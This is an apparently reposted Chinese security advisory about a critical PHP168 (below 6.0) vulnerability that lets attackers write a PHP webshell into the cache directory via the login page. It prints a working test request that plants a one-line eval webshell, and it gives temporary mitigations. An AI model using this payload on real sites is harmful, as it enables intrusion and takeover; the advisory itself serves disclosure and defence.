注册
登录
| 关键词: 漏洞 PHP168 cache 网站 已经 版本 目录 php 语句 临时 |
最近PHP168的最新漏洞 危险等级:极高 漏洞测试版本:PHP168 6.0以下版本 由于php过滤不严导致,入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 测试语句: ?makehtml=1&chdb[htmlname]=hack.php&chdb[path]=cache&content=?php%20@eval($_POST[hack]);?> 目前该漏洞入侵动画已经在互联网发布出来,该漏洞造成很多网站已经遭挂马或者入侵。如果您的网站系统是php168或者此类版本,请立即检查网站cache目录下是否已经写入木马。 目前官方还未公布漏洞补丁,黑基网提供临时解决方案: 1. 请您修改根目录下的login.php文件名 2.如果实在怕被再次入侵可以考虑设置cache目录无脚本执行权限来临时阻止此漏洞的侵袭。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
